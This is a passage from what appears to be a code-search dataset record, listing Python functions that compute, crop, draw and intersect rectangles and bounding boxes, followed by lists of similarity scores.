np.zeros((1,65), np.float64)\n fg_model = np.zeros((1,65), np.float64)\n cv2.grabCut(img, mask, rect, bg_model, fg_model, 5, cv2.GC_INIT_WITH_RECT)\n flattened = mask.flatten()\n mask2 = np.where((mask == 2) | (mask == 0), 0, 1).astype('uint8')\n img = img * mask2[:,:,np.newaxis]\n # SHOW IMAGE\n # cv2.imshow(\"picture\",img)\n # cv2.waitKey(100)\n background_coords = np.where((flattened == 1) | (flattened == 3))\n # return (img , background_coords)\n ListBG = [len(background_coords[0])]\n ListBG.extend(list(background_coords[0]))\n return ListBG", "def phantom_rectangles(n_points,R):\n \n \n #Rescaling according to image size \n R[:,0] = R[:,0]*n_points/2\n R[:,1] = R[:,1]*n_points/2\n R[:,2] = R[:,2]*n_points/2\n R[:,3] = R[:,3]*n_points/2\n R[:,4] = R[:,4]*math.pi/180\n \n x,y = np.meshgrid(np.arange(0,n_points)-n_points//2 ,np.arange(0,n_points)-n_points//2 )\n nrow,ncol = R.shape\n phantom1 = np.zeros((y.shape[0], y.shape[1], nrow))\n\n for k in range(nrow): #itero sui rettangoli\n x_new = x - R[k,0]\n y_new = y - R[k,1]\n\n u = abs(x_new*math.cos(R[k,4])+y_new*math.sin(R[k,4]))\n v = abs(-x_new*math.sin(R[k,4])+y_new*math.cos(R[k,4]))\n\n for i in range(x.shape[0]):\n for j in range(x.shape[1]):\n if 
(u[i,j] < R[k,2]/2 and v[i,j] < R[k,3]/2):\n phantom1[i,j,k] = R[k,5]; # gray scale\n else:\n phantom1[i,j,k] = 0.0;\n #endif\n #endfor\n #endfor\n #endfor\n\n phantom1 = phantom1.sum(axis=2)\n phantom = np.flipud(phantom1)\n return phantom", "def get_bounds(self):\r\n left, bottom, front = 10000, 10000, 10000\r\n right, top, back = -10000, -10000, -10000\r\n for b in self.buf:\r\n for v in b.vertices:\r\n if v[0] < left:\r\n left = v[0]\r\n if v[0] > right:\r\n right = v[0]\r\n if v[1] < bottom:\r\n bottom = v[1]\r\n if v[1] > top:\r\n top = v[1]\r\n if v[2] < front:\r\n front = v[2]\r\n if v[2] > back:\r\n back = v[2]\r\n\r\n return (left, bottom, front, right, top, back)", "def brute_force_rectangles_in_grid(x, y):\n s = set(imap(lambda a: hasher(*a), combinations(grid(x, y), 2)))\n s.discard(0)\n return len(s)", "def extract_walls(img_array,x_scale,y_scale,wall_height):\n\n wall_th = 2\n length = 0\n wall_list = []\n\n #check for horizontal walls first\n for row in range(img_array.shape[0]):\n for col in range(img_array.shape[1]):\n \n sec = img_array.astype(int)[row:row+2,col:col+2]\n \n if left_edge(sec):\n #check two steps to the right\n next_sec = img_array.astype(int)[row:row+2, col+1:col+3]\n next_next_sec = img_array.astype(int)[row:row+2, col+2:col+4]\n\n #if horizontal wall, get coordinates and count length\n if is_wall(next_sec) and not right_edge(next_next_sec): \n #record corner coordinates\n x = col +1\n y = row\n while is_wall(next_sec):\n #start counting length across, until right edge found\n length +=1\n col +=1\n next_sec = img_array.astype(int)[row:row+2, col:col+2]\n #create wall object and store in list \n new_wall = Wall(x*x_scale,y*y_scale,length*x_scale,wall_th*y_scale,wall_height)\n wall_list.append(new_wall)\n length = 0\n\n #check for vertical walls\n for col in range(img_array.shape[1]):\n for row in range(img_array.shape[0]):\n\n sec = img_array.astype(int)[row:row+2,col:col+2]\n \n if top_edge(sec): \n #check two steps below\n next_sec = img_array.astype(int)[row+1:row+3, col:col+2]\n next_next_sec = img_array.astype(int)[row+2:row+4, col:col+2]\n\n #if vertical wall, get coordinates and count length\n if is_wall(next_sec) and is_wall(next_next_sec):\n x = col\n y = row\n while is_wall(next_sec):\n #start counting length downwards, until bottom edge found\n length += 1\n row += 1\n next_sec = img_array.astype(int)[row:row+2, col:col+2]\n #create wall object and store in list\n new_wall = Wall(x*x_scale,y*y_scale,wall_th*x_scale,length*y_scale, wall_height)\n wall_list.append(new_wall)\n length = 0\n\n return wall_list", "def imagesAt(self, rects, colorKey = None):\n return [self.image_at(rect, colorKey) for rect in rects]", "def Recursive_Rectangles(*args):\n if len(args) == 1 and isinstance(args[0], Rectangle):\n rectangle = args[0]\n else:\n rectangle = Rectangle(*args)\n dx, dy = rectangle.vertices[0]\n if (dx, dy) == (0, 0):\n return _Recursive_Rectangles(*rectangle.vertices[1])\n\n rects = _Recursive_Rectangles(*rectangle.translated(-dx, -dy).vertices[1])\n return set(r.translated(dx, dy) for r in rects)\n # return set(((x1 + dx, y1 + dy), (x2 + dx, y2 + dy)) for ((x1, y1), (x2, y2)) in rects)", "def intersect(x):\n if len(x) < 2:\n return x\n\n # Make sure everybody have the same shape\n first_shape = tuple(x[0].shape)\n for pixmap in x[1:]:\n if first_shape != tuple(pixmap.shape):\n return []\n\n return [(np.prod(np.array(x), axis=0) > 0).astype(int)]", "def rect(rng, lines, columns):\n\n w = rng.randint(1, max(1, lines // 2))\n h = rng.randint(1, 
max(1, columns // 2))\n\n i = rng.randint(0, lines - h)\n j = rng.randint(0, columns - w)\n \n return i, j, w, h", "def _find_bboxes_in_rect(bboxes, left, bottom, right, top):\n result = (bboxes[:, 0] <= right) & (bboxes[:, 2] >= left) & \\\n (bboxes[:, 1] <= top) & (bboxes[:, 3] >= bottom)\n return result", "def constructRectangle(self, area: int) -> List[int]:\n w = int(area ** 0.5)\n while area % w:\n w -= 1\n\n return [area // w, w]", "def crop_image(image,list_coordinate):\n list_character = []\n lp_image = imutils.resize(image,width = 200)\n for bbox in list_coordinate:\n if bbox[0][0] == bbox[0][1] == bbox[1][0] == bbox[1][1]:\n break\n\n pts = np.array([(bbox[0][0],bbox[0][1]),\n (bbox[1][0],bbox[1][1]),\n (bbox[2][0],bbox[2][1]),\n (bbox[3][0],bbox[3][1])],dtype = \"float32\")\n \n warped = four_point_transform(lp_image,pts)\n\n # _,warped = cv2.threshold(cv2.cvtColor(warped,cv2.COLOR_BGR2GRAY),0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n # warped = cv2.resize(warped,(12,28))\n warped = resize_and_pad(warped, (28,28), padColor= 255)\n warped = warped / 255.0\n\n # warped = warped[..., None]\n list_character.append(warped)\n return list_character", "def bound_shapes(contours):\r\n\r\n contours_poly = [None]*len(contours)\r\n boundRect = [None]*len(contours)\r\n centers = [None]*len(contours)\r\n radius = [None]*len(contours)\r\n for i, c in enumerate(contours):\r\n contours_poly[i] = cv2.approxPolyDP(c, 3, True)\r\n boundRect[i] = cv2.boundingRect(contours_poly[i])\r\n centers[i], radius[i] = cv2.minEnclosingCircle(contours_poly[i])\r\n \r\n return (contours_poly, boundRect, centers, radius)", "def _crop_region(polygons, left, bottom, right, top, precision):\n cropped_polygons = []\n for p in polygons:\n clipped_polys = clipper._chop(p, [top, bottom], 1, 1 / precision)\n # polygon, [cuts], axis, scale\n for cp in clipped_polys[1]:\n result = clipper._chop(cp, [left, right], 0, 1 / precision)\n cropped_polygons += list(result[1])\n return cropped_polygons", "def _recursive_rectangles(x, y):\n if x < 1 or y < 1:\n raise ValueError(\"Invalid input\")\n if x == 1 and y == 1:\n return {((0, 0), (1, 1)), }\n if x == 1:\n return _recursive_rectangles(x, y-1) | set(((0, j), (x, y)) for j in range(y))\n if y == 1:\n return _recursive_rectangles(x-1, y) | set(((i, 0), (x, y)) for i in range(x))\n return _recursive_rectangles(x-1, y) | _recursive_rectangles(x, y-1) | \\\n set(((i, j), (x, y)) for i in range(x) for j in range(y))", "def _find_largest_rects_in_hatch(x, y):\n if x < y: # Swap to iterate over the longest side.\n x, y = y, x\n\n rectangles = []\n for i in range(1, x): # Iterate over lower-edge vertices, ignoring corners\n a0, a1 = i, -i # Slope-intercepts for cross-hatch lines running through point (0, i)\n for j in range(1, x): # Iterate over upper-edge vertices, still ignoring corners\n b0, b1 = y - j, y + j # Slope-intercepts for cross-hatch lines running through point (y, j)\n x0, x1 = (a0 - b0) / 2, (b1 - a1) / 2\n if x >= x0 >= 0 and x >= x1 >= 0 and y > -x0 + a0 > 0 and y > x1 + a1 > 0: # All four corners are w/i grid\n rectangles.append(((i, 0), (j, y))) # Pairs of pairs\n # assert len(rectangles) == (2*y - 1) * (x - y) + (y - 1)\n return rectangles", "def gen_crop_area(x_res, y_res, dim):\n crop_area = []\n\n for x in range(math.floor(dim[0] / x_res)):\n for y in range(math.floor(dim[1] / y_res)):\n left = x * x_res\n right = left + x_res\n upper = y * y_res\n lower = upper + y_res\n crop_area.append((left, upper, right, lower))\n\n return crop_area", "def 
quadkeys_to_bounds(quadkeys: List[str]):\n tile_bounds = [\n mercantile.bounds(mercantile.quadkey_to_tile(qk)) for qk in quadkeys\n ]\n\n minx = 180\n miny = 90\n maxx = -180\n maxy = -90\n for tb in tile_bounds:\n minx = min(minx, tb[0])\n miny = min(miny, tb[1])\n maxx = max(maxx, tb[2])\n maxy = max(maxy, tb[3])\n\n return [minx, miny, maxx, maxy]", "def board_bounds(live_coords):\n if not live_coords:\n return False\n min_x = live_coords[0][0]\n max_x = live_coords[0][0]\n min_y = live_coords[0][1]\n max_y = live_coords[0][1]\n for i, j in live_coords:\n if min_x > i:\n min_x = i\n if i > max_x:\n max_x = i\n if min_y > j:\n min_y = j\n if j > max_y:\n max_y = j\n return [[min_x, min_y], [max_x, max_y]]", "def bbox_from_circle(img, circles):\n seg_imgs = []\n bboxes = []\n aux = img.copy()\n for i,el in enumerate(circles):\n bbox = circle_2_bbox(el['coord'])\n bbox = fix_bbox(bbox,aux.shape)\n cv.rectangle(aux,bbox[0],bbox[1],(0,255,0))\n bboxes.append(bbox)\n return bboxes", "def render(\n xs: np.array,\n ys: np.array,\n x_min: float,\n x_max: float,\n y_min: float,\n y_max: float,\n width: int,\n height: int,\n) -> np.array:\n assert xs.shape == ys.shape\n assert x_max > x_min\n assert y_max > y_min\n assert width > 0\n assert height > 0\n\n x_indices = discretize(np.array(xs), x_min, x_max, steps=width)\n y_indices = discretize(np.array(ys), y_min, y_max, steps=height)\n\n # Invert y direction to optimize for plotting later\n y_indices = (height - 1) - y_indices\n\n # Filter out of view pixels\n xy_indices = np.stack((x_indices, y_indices)).T\n xy_indices = xy_indices[\n (xy_indices[:, 0] >= 0)\n & (xy_indices[:, 0] < width)\n & (xy_indices[:, 1] >= 0)\n & (xy_indices[:, 1] < height)\n ]\n xy_indices = xy_indices.T\n\n # Assemble pixel matrix\n pixels = np.zeros((height, width), dtype=int)\n pixels[xy_indices[1], xy_indices[0]] = 1\n\n return pixels", "def get_patches(points, h, w, patches=[[450, 100, 10, 10], [450, 500, 10, 10]], min_valid_percent=0.75):\n pc_image = points.reshape((h, w, 3))\n pc_patches = []\n for patch in patches:\n possible_patch = pc_image[patch[0]:patch[0] + patch[2], patch[1]:patch[1] + patch[3]]\n possible_patch = possible_patch.reshape(possible_patch.size // 3, 3)\n possible_patch = filter_zero(possible_patch)\n if possible_patch.shape[0] > min_valid_percent * (patch[2] * patch[3]):\n pc_patches.append(possible_patch)\n return pc_patches", "def __areas_to_pool(self, region_width, region_height, region_width_step, region_height_step):\n \n areas = [[(width_ind * region_width_step, height_ind * region_height_step,\n (width_ind + 1) * region_width_step if (width_ind + 1) < self.width else region_width,\n (height_ind + 1) * region_height_step if (height_ind + 1) < self.height else region_height) for width_ind in range(self.width)] for height_ind in range(self.height)]\n\n return areas", "def covering_box(boxes):\n x_min = np.amin([b.x for b in boxes])\n x_max = np.amax([b.x + b.width for b in boxes])\n y_min = np.amin([b.y for b in boxes])\n y_max = np.amax([b.y + b.height for b in boxes])\n cover = Box(x_min, y_min, x_max - x_min, y_max - y_min)\n return cover", "def draw(list_rectangles, list_squares):\n\n art = turtle.Turtle()\n\n def set_position(x, y):\n art.penup()\n art.goto(x, y)\n art.pendown()\n\n def beauty_rectangle(width, height, art):\n art.begin_fill()\n for i in range(2):\n art.forward(width)\n art.right(90)\n art.forward(height)\n art.right(90)\n art.end_fill()\n\n for rectangle in list_rectangles:\n art.color(\"#800080\")\n 
set_position(rectangle.x, rectangle.y)\n beauty_rectangle(rectangle.width, rectangle.height, art)\n set_position(-1 * rectangle.x, -1 * rectangle.y,)\n\n for square in list_squares:\n art.color(\"#40E0D0\")\n set_position(square.x, square.y)\n beauty_rectangle(square.size, square.size, art)\n set_position(-1 * square.x, -1 * square.y)\n\n turtle.done()", "def extract(pixels, rmin, rmax, cmin, cmax):\n copy = blank_image(rmax-rmin, cmax -cmin) \n for r in range(rmin, rmax):\n for c in range(cmin, cmax):\n copy[r-rmin][c-cmin] = pixels[r][c]\n return copy", "def rect(coords : Tuple[int, int]) -> Tuple[int, int, int, int]:\n min_x = min([x for x, _ in coords])\n max_x = max([x for x, _ in coords])\n min_y = min([y for _, y in coords])\n max_y = max([y for _, y in coords])\n\n return (min_x, max_x, min_y, max_y)", "def del_rectangles(image, rects):\n for r in rects:\n cv2.rectangle(image,\n (r.x, r.y),\n (r.x + r.w - 1, r.y + r.h - 1),\n color=0,\n thickness=-1)", "def bounding_boxes(self, detections):\n bboxes = []\n while len(detections) > 0:\n det = detections.pop(0)\n merging = True\n while merging:\n merging = False\n pointer = 0\n while pointer < len(detections):\n if self.get_distance(det, detections[pointer]) <= self.max_distance:\n det = self.merge_boxes(det, detections[pointer])\n merging = True\n detections.pop(pointer)\n else:\n pointer += 1\n if det[4] >= self.min_area:\n bboxes.append(det)\n return bboxes", "def find_squares( contours, debug=False ):\r\n #=================================================================\r\n # The Minimum and Maximum rations for width vs height for the goal\r\n # based on experimental results goal is approx 1.5:1\r\n #=================================================================\r\n MIN_RATIO = 1.3\r\n MAX_RATIO = 1.8\r\n ret = []\r\n\r\n for shape in contours:\r\n x, y, w, h = cv2.boundingRect( shape )\r\n w_h_ratio = float( w ) / float( h )\r\n if debug:\r\n print \"Area\", (w * h)\r\n print \"Width \", w\r\n print \"Height\", h\r\n if MIN_RATIO < w_h_ratio and w_h_ratio < MAX_RATIO:\r\n ret.append( shape )\r\n\r\n return( ret )", "def find_obstacle_loc(self, obstacle_list):\n\n x_obst = []\n y_obst = []\n #x_obst_append = x_obst.append\n #y_obst_append = y_obst.append\n locs = []\n\n for x in obstacle_list:\n if x < self.width:\n x_obst.append(x*self.resolution + self.resolution/2)\n else:\n x_obst.append((x % self.width)*self.resolution + self.resolution/2)\n\n for y in obstacle_list:\n y_obst.append((y/self.width)*self.resolution + self.resolution/2)\n\n locs = map(lambda x: x, zip(x_obst, y_obst))\n\n return(locs)", "def obscure(rects):\n image = Image.open('/tmp/.i3lock.png')\n\n for rect in rects:\n area = (\n rect.x, rect.y,\n rect.x + rect.width,\n rect.y + rect.height\n )\n\n cropped = image.crop(area)\n cropped = obscure_image(cropped)\n image.paste(cropped, area)\n overlay = Image.open('/home/robin/Documents/source/scripts/src/locked.png')\n image.paste(overlay, tuple([(i-o)/2 for i,o in zip(image.size,overlay.size)]), overlay)\n image.save('/tmp/.i3lock.png')", "def extract_roi(reg_with_roi, ir_with_roi, reg_unmarked, ir_unmarked):\n roi_pos = np.where( reg_with_roi[:,:,2] == 255 ) \n \n x = list(roi_pos[0])\n y = list(roi_pos[1])\n \n #make a 2-d mask\n \n mask = np.zeros_like(reg_with_roi[:,:,1])\n mask[x,y] = 255\n \n _, cntrs = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[:2]\n\n reg_roi_list = []\n ir_roi_list = []\n \n #masks = []\n for cnt in cntrs:\n \n if reg_unmarked.ndim == 3:\n reg_unmarked = 
cv2.cvtColor(reg_unmarked, cv2.COLOR_BGR2GRAY)\n \n if ir_unmarked.ndim == 3:\n ir_unmarked = cv2.cvtColor(ir_unmarked, cv2.COLOR_BGR2GRAY)\n \n temp_mask = np.zeros_like(reg_unmarked)\n cv2.fillPoly(temp_mask, [cnt], (255,255,255))\n #masks.append(temp_mask)\n \n reg_roi = cv2.bitwise_and(temp_mask, reg_unmarked)\n ir_roi = cv2.bitwise_and(temp_mask, ir_unmarked)\n \n x, y, w, h = cv2.boundingRect(cnt)\n reg_roi = reg_roi[y:y+h, x:x+w]\n ir_roi = ir_roi[y:y+h, x:x+w]\n \n reg_roi_list.append(reg_roi)\n ir_roi_list.append(ir_roi)\n \n return reg_roi_list, ir_roi_list, cntrs", "def get_squares(x, y, width, height):\n return product(range(x+1, x+width+1), range(y+1, y+height+1))", "def bisect_rectange(numSplits, minlat, minlong, maxlat, maxlong):\n #initialize function variables\n longpoints = []\n latpoints = []\n extents = []\n\n #Get a list of the split lat/long locations in the rectangle\n for i in range(numSplits+1):\n latpoints.append( (minlat + ((maxlat-minlat)/numSplits)*i) )\n longpoints.append( (minlong + ((maxlong-minlong)/numSplits)*i) )\n\n #Loop through the line locations and create a list of sub-rectangles\n for latindex, latmin in enumerate(latpoints):\n for longindex, longmin in enumerate(longpoints):\n if latindex<(len(latpoints)-1) and longindex<(len(longpoints)-1):\n newextent = [latmin, longmin, latpoints[latindex+1], longpoints[longindex+1]]\n extents.append(newextent)\n return extents", "def crop(self, rect):\n maybe_cropped_area = self.to_bbox().crop(rect)\n if len(maybe_cropped_area) == 0:\n return []\n else:\n [cropped_area] = maybe_cropped_area\n cropped_origin = PointLocation(row=cropped_area.top, col=cropped_area.left)\n cropped_area_in_data = cropped_area.translate(drow=-self._origin.row, dcol=-self.origin.col)\n return [MultichannelBitmap(data=cropped_area_in_data.get_cropped_numpy_slice(self._data),\n origin=cropped_origin,)]", "def cuts(self) -> list[list[int]]:\n if self._cuts is not None:\n return self._cuts\n width = self.width\n height = self.height\n screen_region = Region(0, 0, width, height)\n cuts_sets = [{0, width} for _ in range(height)]\n\n if self.map is not None:\n for region, order, clip in self.map.values():\n region = region.intersection(clip)\n if region and (region in screen_region):\n region_cuts = region.x_extents\n for y in region.y_range:\n cuts_sets[y].update(region_cuts)\n\n # Sort the cuts for each line\n self._cuts = [sorted(cut_set) for cut_set in cuts_sets]\n return self._cuts", "def _find_largest_Rectangles_in_cross_hatch(x, y):\n if x < y: # Swap to iterate over the longest side.\n x, y = y, x\n\n rectangles = []\n for i in range(1, x): # Iterate over lower-edge vertices, ignoring corners\n a0, a1 = i, -i # Slope-intercepts for cross-hatch lines running through point (0, i)\n for j in range(1, x): # Iterate over upper-edge vertices, still ignoring corners\n b0, b1 = y - j, y + j # Slope-intercepts for cross-hatch lines running through point (y, j)\n x0, x1 = (a0 - b0) / 2, (b1 - a1) / 2\n if x >= x0 >= 0 and x >= x1 >= 0 and y > -x0 + a0 > 0 and y > x1 + a1 > 0: # All four corners are w/i grid\n rectangles.append(Rectangle((i, 0), (j, y), aligned_with_grid=False))\n # assert len(rectangles) == (2*y - 1) * (x - y) + (y - 1)\n return rectangles", "def surround(self, p):\n res = set([])\n if p.x + 1 < self.height:\n res.add((p.x + 1, p.y))\n if p.y + 1 < self.width:\n res.add((p.x + 1, p.y + 1))\n res.add((p.x, p.y + 1))\n if p.y - 1 >= 0:\n res.add((p.x + 1, p.y - 1))\n res.add((p.x, p.y - 1))\n if p.x - 1 >= 0:\n res.add((p.x - 1, 
p.y))\n if p.y + 1 < self.width:\n res.add((p.x - 1, p.y + 1))\n res.add((p.x, p.y + 1))\n if p.y - 1 >= 0:\n res.add((p.x - 1, p.y - 1))\n res.add((p.x, p.y - 1))\n return res", "def uniform_rect(mouth, face, width, height):\n if mouth is None:\n return None\n\n mc_x, mc_y = mouth[0] + 0.5 * mouth[2], mouth[1] + 0.5 * mouth[3] # Mouth center point.\n\n rect_bottom = mc_y + 0.5 * height\n\n rect_x = mc_x - 0.5 * width\n rect_y = mc_y - 0.5 * height - max(0, rect_bottom - (face[2] + face[3]))\n\n return [int(round(i)) for i in [rect_x, rect_y, width, height]]", "def clip_rect(selected_corners: np.ndarray, clipped_uv_verts: np.ndarray) -> np.ndarray:\n prev = selected_corners[-1]\n for corner in selected_corners:\n # interpolate line segments to the image border\n clip_prev, clip_corner = clip_segment_v3_plane_n(\n copy.deepcopy(prev), copy.deepcopy(corner), copy.deepcopy(planes)\n )\n prev = corner\n if clip_prev is None or clip_corner is None:\n continue\n a, b = clip_line_segment(clip_prev, clip_corner, K)\n clipped_uv_verts = np.vstack([clipped_uv_verts, a[:2].reshape(-1, 2)])\n clipped_uv_verts = np.vstack([clipped_uv_verts, b[:2].reshape(-1, 2)])\n\n return clipped_uv_verts", "def get_bounding_box(img):\n rows = np.any(img, axis=1)\n cols = np.any(img, axis=0)\n rmin, rmax = np.where(rows)[0][[0, -1]]\n cmin, cmax = np.where(cols)[0][[0, -1]]\n # due to python indexing, need to add 1 to max\n # else accessing will be 1px in the box, not out\n rmax += 1\n cmax += 1\n return [rmin, rmax, cmin, cmax]", "def framewise_inside_rectangle_roi(\n bp_location: np.ndarray, roi_coords: np.ndarray\n ) -> np.ndarray:\n results = np.full((bp_location.shape[0]), 0)\n within_x_idx = np.argwhere(\n (bp_location[:, 0] <= roi_coords[1][0])\n & (bp_location[:, 0] >= roi_coords[0][0])\n ).flatten()\n within_y_idx = np.argwhere(\n (bp_location[:, 1] <= roi_coords[1][1])\n & (bp_location[:, 1] >= roi_coords[0][1])\n ).flatten()\n for i in prange(within_x_idx.shape[0]):\n match = np.argwhere(within_y_idx == within_x_idx[i])\n if match.shape[0] > 0:\n results[within_x_idx[i]] = 1\n return results", "def get_dancefloor_area(self):\n cords = []\n\n x1 = self.coordinates[0]\n y1 = self.coordinates[1]\n x2 = self.coordinates[0] + self.width\n y2 = self.coordinates[1] + self.height\n if self.width <= 0:\n x1, x2 = x2, x1\n if self.height <= 0:\n y1, y2 = y2, y1\n\n for x in range(x1, x2):\n for y in range(y1, y2):\n if x % 20 == 0 and y % 20 == 0:\n cords.append([x, y])\n return cords", "def test_tiles_to_bounds():\n tiles = [morecantile.Tile(x=150, y=182, z=9), morecantile.Tile(x=151, y=182, z=9)]\n assert len(utils.tiles_to_bounds(tiles)) == 4", "def pixelcode(self):\n\n maxX, maxY = self.size()\n result = bitmap((2*maxX, 2*maxY))\n for x in range(maxX):\n for y in range(maxY):\n pixel = self.get(x,y)\n result.set(2*x,2*y, pixel)\n result.set(2*x,2*y+1, not pixel)\n result.set(2*x+1,2*y, not pixel)\n result.set(2*x+1,2*y+1, pixel)\n return result", "def rectIntersect(rect1, rect2):\n rect = np.zeros_like(rect1)\n rect[[0, 2]] = np.maximum(rect1[[0, 2]], rect2[[0, 2]])\n rect[[1, 3]] = np.minimum(rect1[[1, 3]], rect2[[1, 3]])\n return rect", "def drawRectangle(img, boxs_t, boxs_p, unseenName):\n img_p = img.copy()\n img_t = img.copy()\n for b in boxs_t:\n clas = unseenName[str(b[1])]\n x1, x2, y1, y2 = b[0][0], b[0][2], b[0][1], b[0][3]\n cv2.rectangle(img_t, (x1, y1), (x2, y2), (0, 255, 0), 2)\n cv2.putText(img_t, clas, (x1+10, y1+10), cv2.FONT_HERSHEY_TRIPLEX, 0.5,\n (0, 255, 0), 1)\n\n for b in boxs_p:\n clas = 
unseenName[str(b[1])]\n x1, x2, y1, y2 = b[0][0], b[0][2], b[0][1], b[0][3]\n cv2.rectangle(img_p, (x1, y1), (x2, y2), (255, 0, 0), 2)\n cv2.putText(img_p, clas, (x1+10, y1+10), cv2.FONT_HERSHEY_TRIPLEX, 0.5,\n (255, 0, 0), 1)\n\n return img_t, img_p", "def compute_bb(self):\n all_shapes = list(self.parts.values()) + list(self.edges.values())\n bbox_vertices = cascaded_union(all_shapes).envelope.exterior.coords.xy\n min_x = min(bbox_vertices[0])\n max_x = max(bbox_vertices[0])\n min_y = min(bbox_vertices[1])\n max_y = max(bbox_vertices[1])\n return [min_x, max_x,min_y, max_y]", "def order_rect(pts):\n new = np.zeros((4, 2), dtype=\"int64\")\n s = pts.sum(axis=1)\n new[0] = pts[np.argmin(s)]\n new[2] = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis=1)\n new[1] = pts[np.argmin(diff)]\n new[3] = pts[np.argmax(diff)]\n\n return new" ]
[ "0.6603085", "0.65592986", "0.65554035", "0.6548141", "0.65277016", "0.6455441", "0.6452907", "0.644425", "0.64078", "0.6345731", "0.63407683", "0.63396865", "0.6298158", "0.62660736", "0.6236707", "0.6198757", "0.61927736", "0.6180278", "0.616941", "0.61400336", "0.61380047", "0.61268324", "0.60898894", "0.6073675", "0.6072698", "0.6070401", "0.6061438", "0.60273147", "0.60273147", "0.6014901", "0.5993387", "0.59888077", "0.59734184", "0.5972689", "0.5959817", "0.5957508", "0.5954441", "0.5953578", "0.5952327", "0.5933188", "0.59206903", "0.5910768", "0.59082067", "0.59061646", "0.59020704", "0.5900496", "0.58889043", "0.588566", "0.5876024", "0.5875951", "0.5875098", "0.5847622", "0.58456403", "0.5806956", "0.5806725", "0.57992303", "0.57897335", "0.57867193", "0.5781939", "0.57803303", "0.57756215", "0.57704186", "0.57663196", "0.5756401", "0.5745564", "0.5742384", "0.5741134", "0.57349485", "0.5725382", "0.57234555", "0.57188404", "0.5718798", "0.5709828", "0.5709765", "0.5704823", "0.5702783", "0.5701929", "0.5698742", "0.5696873", "0.56939584", "0.5692093", "0.5683948", "0.5683468", "0.5678863", "0.5678056", "0.56652886", "0.5663054", "0.5662298", "0.5657033", "0.5640503", "0.5634824", "0.56299037", "0.5628786", "0.56267774", "0.5621313", "0.5613953", "0.56133395", "0.56097555", "0.560335", "0.5599544" ]
0.59542006
37
From the list of rectangles, build a list of pixels that these rectangles cover
def _build_list_of_excluded_pixels(self, exclude_zones):
    pixels = []
    for x, y, width, height in exclude_zones:
        for row in range(height):
            for col in range(width):
                pixels.append(Pixel(col + x, row + y))
    return pixels
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rect(rows: int, cols: int, top: int = 0,\n left: int = 0) -> List['GridQubit']:\n return [\n GridQubit(row, col)\n for row in range(top, top + rows)\n for col in range(left, left + cols)\n ]", "def find_rects(image: np.ndarray) -> List[np.ndarray]:\n\n gray = cv.cvtColor(image.copy(), cv.COLOR_RGB2GRAY)\n gray = cv.GaussianBlur(gray, (5, 5), 0)\n #edged = cv.Canny(gray, 70, 180) # this numbers is hand picked guess from a few photos\n edged = auto_canny(gray)\n\n contours = cv.findContours(edged.copy(), cv.RETR_LIST, cv.CHAIN_APPROX_SIMPLE)\n contours = contours[0] if len(contours) == 2 else contours[1]\n contours.sort(key=cv.contourArea, reverse=True)\n contours = [cnt for cnt in contours if cv.contourArea(cnt) > 15] # 15px contour area, basically cnt>=4x4\n\n rects = list(map(cv.minAreaRect, contours))\n boxes = list(map(lambda r: Rect.from_cvrect(*r[0], *r[1]), rects))\n\n boxes = Rect.nms_merge(boxes)\n\n return boxes or list()", "def extract_valid_rects(rects, img, others_landmark_pts):\n # Extraction\n dst = list()\n for rect in rects:\n # Check if others landmarks are contained\n for others_pt in others_landmark_pts:\n if rect_contain(rect, others_pt):\n break\n else:\n dst.append(rect)\n\n # avoid no rectangle\n if len(dst) == 0:\n dst.append((0, 0, img.shape[1], img.shape[0]))\n\n return dst", "def normalizeRects(rects):\n\tsmallestX = min(rect[0] for rect in rects)\n\tsmallestY = min(rect[1] for rect in rects)\n\treturn list(\n\t\t(-smallestX + left,\n\t\t -smallestY + top,\n\t\t -smallestX + right,\n\t\t -smallestY + bottom) for left, top, right, bottom in rects\n\t)", "def find_overlap_rect_list(rect_list):\n\n\n overlap_list = []\n\n for index, item in enumerate(rect_list):\n index += 1\n\n while index < len(rect_list):\n #check item with next rectangle in the list\n x_overlap = find_overlap_range(item['left_x'], item['width'], \n rect_list[index]['left_x'],\n rect_list[index]['width'])\n \n y_overlap = find_overlap_range(item['bottom_y'], item['height'], \n rect_list[index]['bottom_y'],\n rect_list[index]['height'])\n\n if x_overlap and y_overlap:\n overlap_list.append({'left_x':x_overlap[0], \n 'bottom_y': y_overlap[0],\n 'width': x_overlap[1],\n 'height': y_overlap[1]})\n\n index += 1\n\n return overlap_list", "def getBigRectangles(recognisedFacesCenters, recognisedFacesPercentages, recognisedFacesCenterSizes):\n recognisedBigFacesCenters = []\n recognisedBigFacesCentersSizes = []\n recognisedBigFacesPercentages = []\n\n \"\"\"Putting the higest probability frame in the final array by default\"\"\"\n maxvalueCenters = max(recognisedFacesPercentages)\n maxposCenters = recognisedFacesPercentages.index(maxvalueCenters)\n\n recognisedBigFacesCenters.append(recognisedFacesCenters[maxposCenters])\n recognisedBigFacesCentersSizes.append(\n recognisedFacesCenterSizes[maxposCenters])\n recognisedBigFacesPercentages.append(\n recognisedFacesPercentages[maxposCenters])\n\n \"\"\"Purging initial arrays of the values we just put in the final arrays\"\"\"\n recognisedFacesCenters.pop(maxposCenters)\n recognisedFacesPercentages.pop(maxposCenters)\n recognisedFacesCenterSizes.pop(maxposCenters)\n\n for i in range(len(recognisedFacesCenters)):\n maxvalueCenters = max(recognisedFacesPercentages)\n maxposCenters = recognisedFacesPercentages.index(maxvalueCenters)\n test = getTowCornersOfRectangle(\n recognisedFacesCenters[maxposCenters], recognisedFacesCenterSizes[maxposCenters], recognisedBigFacesCenters, recognisedBigFacesCentersSizes)\n \"\"\"If the area are not overlapping then add 
